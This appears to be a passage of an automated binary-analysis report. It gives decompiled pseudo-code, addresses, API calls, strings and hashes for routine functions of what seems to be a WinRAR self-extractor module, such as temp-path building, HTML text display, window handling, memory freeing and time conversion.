0x0084bfc0
0x0084bfc0
0x0084bfcc
0x0084bfd3
0x0084bfd8
0x0084bfe0
0x0084bfe6
0x0084bfe7
0x0084bfe8
0x0084bfea
0x0084bfea
0x0084bfff
0x0084c004
0x0084c010
0x0084c012
0x0084c023
0x0084c030
0x00000000
0x0084c014
0x0084c014
0x0084c01f
0x0084c021
0x0084c035
0x0084c035
0x0084c037
0x0084c03d
0x0084c043
0x0084c051
0x0084c056
0x0084c057
0x0084c05f
0x0084c064
0x0084c06b
0x0084c071
0x0084c073
0x0084c079
0x0084c07f
0x0084c081
0x0084c08a
0x0084c08d
0x0084c08f
0x0084c098
0x0084c09b
0x0084c0a1
0x0084c0a4
0x0084c0ad
0x0084c0bc
0x0084c0c1
0x0084c0c9
0x0084c0cb
0x0084c0cc
0x0084c0d2
0x0084c0d3
0x0084c0d5
0x0084c0da
0x0084c0da
0x00000000
0x0084c0c9
0x00000000
0x0084c021
0x0084c012
0x00000000
0x0084c0e2
0x0084c0e2
0x0084c0e5
0x0084c0e7
0x0084c0e7
0x00000000
0x00000000
0x0084bb13
0x0084bb13
0x0084bb1b
0x0084bb21
0x0084bb24
0x0084bb48
0x0084bb26
0x0084bb26
0x0084bb29
0x0084bb3c
0x0084bb2b
0x0084bb2b
0x0084bb2d
0x0084bb32
0x0084bb32
0x0084bb29
0x00000000
0x00000000
0x0084bb8c
0x0084bb8c
0x0084bb8d
0x0084bb92
0x0084bb92
0x0084bb92
0x0084bb95
0x0084bb9a
0x0084bba0
0x0084bba0
0x0084bba6
0x0084bbac
0x0084bbac
0x00000000
0x00000000
0x0084b585
0x0084b587
0x0084b58c
0x0084b592
0x0084b595
0x00000000
0x0084b597
0x0084b597
0x00000000
0x0084b597
0x0084b595
0x0084c11f
0x0084c125
0x0084c12f
0x0084c12f
0x0084bc34
0x0084bc34
0x0084bc3b
0x00000000
0x00000000
0x0084bc41
0x0084bc41
0x0084bc43
0x0084bc4a
0x0084bc52
0x0084bc53
0x0084bc58
0x0084bc59
0x0084bc5a
0x0084bc5c
0x0084bcb0
0x0084bcb0
0x0084bcb8
0x0084bcc6
0x0084bcd7
0x0084bce5
0x0084bce5
0x0084bcf1
0x0084bcf6
0x0084bcf8
0x0084bd08
0x0084bd12
0x0084bd17
0x0084bd1a
0x00000000
0x0084bd20
0x0084bd20
0x0084bd25
0x0084bd25
0x0084bd27
0x0084bd2e
0x0084bd34
0x00000000
0x0084bd34
0x0084bd1a
0x0084bc5e
0x0084bc60
0x0084bc62
0x0084bc69
0x00000000
0x00000000
0x0084bc6b
0x0084bc6b
0x0084bc6d
0x0084bc73
0x0084bc73
0x0084bc73
0x0084bc77
0x00000000
0x00000000
0x0084bc79
0x0084bc79
0x0084bc7a
0x0084bc80
0x0084bc83
0x0084bc85
0x0084bc88
0x00000000
0x00000000
0x0084bc8a
0x00000000
0x0084bc8a
0x0084bc8c
0x0084bc97
0x0084bca1
0x0084bca6
0x0084bca6
0x0084bca8
0x00000000
0x0084bd3a
0x0084bd3a
0x0084bd3d
0x0084bd43
0x0084bd4a
0x0084bd4c
0x0084bd4c
0x0084bd56
0x0084bd56
0x00000000
0x0084bd3d

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0084BBCC
_swprintf.LIBCMT ref: 0084BC00

Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66

SetDlgItemTextW.USER32(?,00000066,008785FA), ref: 0084BC20
_wcschr.LIBVCRUNTIME ref: 0084BC53
EndDialog.USER32(?,00000001), ref: 0084BD34

Strings

%s%s%u, xrefs: 0084BBF5

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: d7f04d44536fd88b8e17b336f0a718c446138388de984ee27a7142065b3b2349
Instruction ID: 963b02f3472527c24aa60608cb1a6ea69c8b1fa2dd01cfe3dcc5a39049e7f780
Opcode Fuzzy Hash: d7f04d44536fd88b8e17b336f0a718c446138388de984ee27a7142065b3b2349
Instruction Fuzzy Hash: 5741477194021DAEEF25DB64DC89EEE77B8FB04308F0080A6E519E6151EFB4DA848F91

Uniqueness

Uniqueness Score: -1.00%

Function 0084892A, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0084892A(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E00848810(_t60);
				_push(0x200 + E00852B93(_t60) * 2);
				_t24 = E00852BB3(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00854DC3(_t64, L"<html>");
				E00856763(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00856763(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E0084145A(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E00856763(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E00856763(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E00848B35(_t58, _t79);
					}
					_t69 = 9 + E00852B93(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00852BAE(_t64);
					_t24 =  *0x86dff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E00848847( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}

0x0084892a
0x0084892d
0x00848933
0x00848a6f
0x00848a6f
0x00848939
0x00848940
0x0084894b
0x0084895b
0x0084895c
0x00848961
0x00848967
0x00848a6a
0x00000000
0x00848a6b
0x00848974
0x0084897f
0x0084898a
0x0084898f
0x00848992
0x00848996
0x0084899a
0x008489a5
0x008489ad
0x008489b4
0x008489b6
0x008489b8
0x008489bc
0x008489be
0x008489be
0x008489c3
0x008489cf
0x008489d7
0x008489dd
0x008489de
0x008489e3
0x008489e5
0x008489ed
0x008489ed
0x008489f9
0x00848a05
0x00848a09
0x00848a13
0x00848a28
0x00848a35
0x00848a2a
0x00848a2a
0x00848a2f
0x00848a2f
0x00848a28
0x00848a39
0x00848a47
0x00848a50
0x00848a5b
0x00848a60
0x00848a67
0x00848a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0084899c
0x0084899c
0x0084899c
0x0084899f
0x0084899f
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0084880B), ref: 008489FF
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00848A20

Strings

<html>, xrefs: 0084896E, 008489A7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00848979
utf-8"></head>, xrefs: 00848984
</html>, xrefs: 008489D1

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 5f0a2e78b288721662d0ce4e021ee5c77b9a7eb540ca8d9b996dd3195b7d820e
Instruction ID: bda993a77fbcd8ca9b6a1330f764c06943297fd243173fd9596b0c0e6544108e
Opcode Fuzzy Hash: 5f0a2e78b288721662d0ce4e021ee5c77b9a7eb540ca8d9b996dd3195b7d820e
Instruction Fuzzy Hash: 5D312832104319BED314AB249C46F6F7BA8FF42721F10411EF911D62C2EFB49A1983A7

Uniqueness

Uniqueness Score: -1.00%

Function 00849059, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00849059(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00848DAA(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00852BAE( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00856702(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x86df88(0,  *0x86dfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x86df90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x86df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x86dfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x86df8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00848E7C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00852BAE(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x00849062
0x00849066
0x0084906c
0x0084906f
0x00849072
0x0084907e
0x00849087
0x0084908c
0x00849091
0x00849097
0x0084909d
0x008490a1
0x00849099
0x00849099
0x00849099
0x008490a7
0x008490ae
0x008490b7
0x008490ce
0x008490d8
0x008490dd
0x008490dd
0x008490e3
0x008490f1
0x0084911e
0x00849124
0x0084912b
0x00849165
0x00849167
0x0084916c
0x00000000
0x00849175
0x0084912d
0x0084912f
0x00849136
0x00849139
0x00849140
0x00849145
0x00849149
0x0084914e
0x00849156
0x00000000
0x00849162
0x00849149
0x00849139
0x0084912f
0x00849181

APIs

ShowWindow.USER32(?,00000000), ref: 00849072
GetWindowRect.USER32(?,00000000), ref: 008490B7
ShowWindow.USER32(?,00000005,00000000), ref: 0084914E
SetWindowTextW.USER32(?,00000000), ref: 00849156
ShowWindow.USER32(00000000,00000005), ref: 0084916C

Strings

RarHtmlClassName, xrefs: 00849118

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 35472032ac2eaee99c51247d1075039c9034c1ec93be93874c7b1364dad24ae4
Instruction ID: 7455557565597885d83e2beb7ce2e6c2253d6658068b7c6913d6d34a7146f3e0
Opcode Fuzzy Hash: 35472032ac2eaee99c51247d1075039c9034c1ec93be93874c7b1364dad24ae4
Instruction Fuzzy Hash: 83318D31904319EFCB219F64DC48F5B7BA8FF48711F018559FD8AAA156CB74D804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0085B561, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085B561(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0085B525(_t45, 7);
					E0085B525(_t45 + 0x1c, 7);
					E0085B525(_t45 + 0x38, 0xc);
					E0085B525(_t45 + 0x68, 0xc);
					E0085B525(_t45 + 0x98, 2);
					E00857AC6( *((intOrPtr*)(_t45 + 0xa0)));
					E00857AC6( *((intOrPtr*)(_t45 + 0xa4)));
					E00857AC6( *((intOrPtr*)(_t45 + 0xa8)));
					E0085B525(_t45 + 0xb4, 7);
					E0085B525(_t45 + 0xd0, 7);
					E0085B525(_t45 + 0xec, 0xc);
					E0085B525(_t45 + 0x11c, 0xc);
					E0085B525(_t45 + 0x14c, 2);
					E00857AC6( *((intOrPtr*)(_t45 + 0x154)));
					E00857AC6( *((intOrPtr*)(_t45 + 0x158)));
					E00857AC6( *((intOrPtr*)(_t45 + 0x15c)));
					return E00857AC6( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0085b567
0x0085b56c
0x0085b575
0x0085b580
0x0085b58b
0x0085b596
0x0085b5a4
0x0085b5af
0x0085b5ba
0x0085b5c5
0x0085b5d3
0x0085b5e1
0x0085b5f2
0x0085b600
0x0085b60e
0x0085b619
0x0085b624
0x0085b62f
0x00000000
0x0085b63f
0x0085b644

APIs

Part of subcall function 0085B525: _free.LIBCMT ref: 0085B54E

_free.LIBCMT ref: 0085B5AF

Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE

_free.LIBCMT ref: 0085B5BA
_free.LIBCMT ref: 0085B5C5
_free.LIBCMT ref: 0085B619
_free.LIBCMT ref: 0085B624
_free.LIBCMT ref: 0085B62F
_free.LIBCMT ref: 0085B63A

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 35f294bb21a7bd77ad2cd66a92d5d152bcc947fc6b4983fb665ce87d90ccf861
Instruction ID: 2cd83a77087471332d8275666201296d62cb15147bd24787a71942033fdaa673
Opcode Fuzzy Hash: 35f294bb21a7bd77ad2cd66a92d5d152bcc947fc6b4983fb665ce87d90ccf861
Instruction Fuzzy Hash: D7117F31941B08BAD931FBB4DC07FDBBB9DFF54702F448814BA99E6052EB24B6084652

Uniqueness

Uniqueness Score: -1.00%

Function 00851694, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00851694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x86d680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E008528EB(__eflags,  *0x86d680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00852925(__eflags,  *0x86d680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00857B91(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00852925(__eflags,  *0x86d680, 0);
								} else {
									__eflags = E00852925(__eflags,  *0x86d680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00857AC6(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x0085169b
0x008516ae
0x008516b5
0x008516b8
0x008516bb
0x008516d4
0x008516d4
0x008516bd
0x008516bd
0x008516bf
0x008516c9
0x008516cf
0x008516d0
0x008516d2
0x008516e2
0x008516e6
0x008516e8
0x008516fc
0x008516fc
0x00851705
0x008516ea
0x008516f8
0x008516fa
0x0085170e
0x00851710
0x00851710
0x00000000
0x00000000
0x00000000
0x008516fa
0x00851713
0x00000000
0x00000000
0x00000000
0x008516d2
0x008516bf
0x0085171b
0x00851725
0x0085169d
0x0085169f
0x0085169f

APIs

GetLastError.KERNEL32(?,?,0085168B,0084F0E2), ref: 008516A2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008516B0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008516C9
SetLastError.KERNEL32(00000000,?,0085168B,0084F0E2), ref: 0085171B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c0313ec98d82d3e9c9ecea7cac4f8dfa09689a8f86eb8f7568bf14f520bdb1e0
Instruction ID: a814cb85e47584b73b41b0276f51ffce1c799c74e0670c12cf9d4bb9635e8d63
Opcode Fuzzy Hash: c0313ec98d82d3e9c9ecea7cac4f8dfa09689a8f86eb8f7568bf14f520bdb1e0
Instruction Fuzzy Hash: F30128326097116EAF152A79BC89A162B94FB26377B210229FC10C91E1FF914C099151

Uniqueness

Uniqueness Score: -1.00%

Function 0084D2D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0084D2D0() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x88fe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x88fe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x88fe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x0084d2d0
0x0084d2db
0x0084d2e3
0x0084d2f5
0x0084d2f9
0x0084d305
0x0084d30d
0x00000000
0x0084d30f
0x0084d315
0x0084d31a
0x0084d322
0x00000000
0x0084d324
0x0084d324
0x0084d324
0x0084d322
0x0084d2fb
0x0084d2fb
0x0084d2fb
0x0084d2fb
0x0084d332
0x0084d338
0x0084d340
0x0084d346
0x00000000
0x00000000
0x00000000
0x0084d342
0x0084d342
0x0084d342
0x0084d342
0x0084d34a
0x0084d2e5
0x0084d2e8
0x0084d2e8
0x0084d2dd
0x0084d2e0
0x0084d2e0

Strings

KERNEL32.DLL, xrefs: 0084D2EA
ReleaseSRWLockExclusive, xrefs: 0084D30F
AcquireSRWLockExclusive, xrefs: 0084D2FF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: c42b39112934f3f3fda5028ae1d69104ea6926897216ac2baa340fc03696d1e9
Instruction ID: 69a89615687d99ce282f9dc9a33321b85611dfab324be8966d97a9f51221ee20
Opcode Fuzzy Hash: c42b39112934f3f3fda5028ae1d69104ea6926897216ac2baa340fc03696d1e9
Instruction Fuzzy Hash: 5101287224173A9B4F205FB86C9059B33C8FA07715311117AE651EB352E799D844E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00857601, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00857601(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x86dd40; // 0x5b22e8
					if(_t7 != 0x86db20) {
						E00857AC6(_t7);
						 *0x86dd40 = 0x86db20;
					}
				}
				E00857AC6( *0x890410);
				 *0x890410 = 0;
				E00857AC6( *0x890414);
				 *0x890414 = 0;
				E00857AC6( *0x890860);
				 *0x890860 = 0;
				E00857AC6( *0x890864);
				 *0x890864 = 0;
				return 1;
			}

0x0085760a
0x0085760e
0x00857610
0x0085761c
0x0085761f
0x00857625
0x00857625
0x0085761c
0x00857631
0x0085763e
0x00857644
0x0085764f
0x00857655
0x00857660
0x00857666
0x0085766e
0x00857677

APIs

_free.LIBCMT ref: 0085761F

Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE

_free.LIBCMT ref: 00857631
_free.LIBCMT ref: 00857644
_free.LIBCMT ref: 00857655
_free.LIBCMT ref: 00857666

Strings

"[, xrefs: 00857601, 00857610, 00857625

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: "[
API String ID: 776569668-3208272576
Opcode ID: a7cc8df9a01301a4888bd68bfe249224ac857c6335348377f4d0c5aa9ef0f8a0
Instruction ID: 6ab85290da1ef1482926849c4cfc53531e55479503d00a02388b4e7c86f4b3dd
Opcode Fuzzy Hash: a7cc8df9a01301a4888bd68bfe249224ac857c6335348377f4d0c5aa9ef0f8a0
Instruction Fuzzy Hash: 5AF05471E08728AF8652FF19BC0181D3BA8FB6575670E5127F924D6272C77006058FC6

Uniqueness

Uniqueness Score: -1.00%

Function 00840938, Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00840938(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0083AA39() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E0084DE00(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x00840938
0x0084093c
0x0084094b
0x0084094d
0x00840956
0x0084095f
0x00840968
0x00840971
0x0084097a
0x00840981
0x00840986
0x0084099a
0x00840a36
0x00840a38
0x008409a0
0x008409ac
0x008409d2
0x008409e3
0x008409f3
0x008409ff
0x00840a07
0x00840a0d
0x00840a15
0x00840a1b
0x00840a1d
0x00840a21
0x008409ae
0x008409b8
0x008409be
0x008409c2
0x008409c2
0x00840a2d
0x00840a2f
0x00840a2f
0x00840a3b
0x00840a3e
0x00840a40
0x00840a4a

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00840996

Part of subcall function 0083AA39: GetVersionExW.KERNEL32(?), ref: 0083AA5E

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008409B8
FileTimeToSystemTime.KERNEL32(?,?), ref: 008409D2
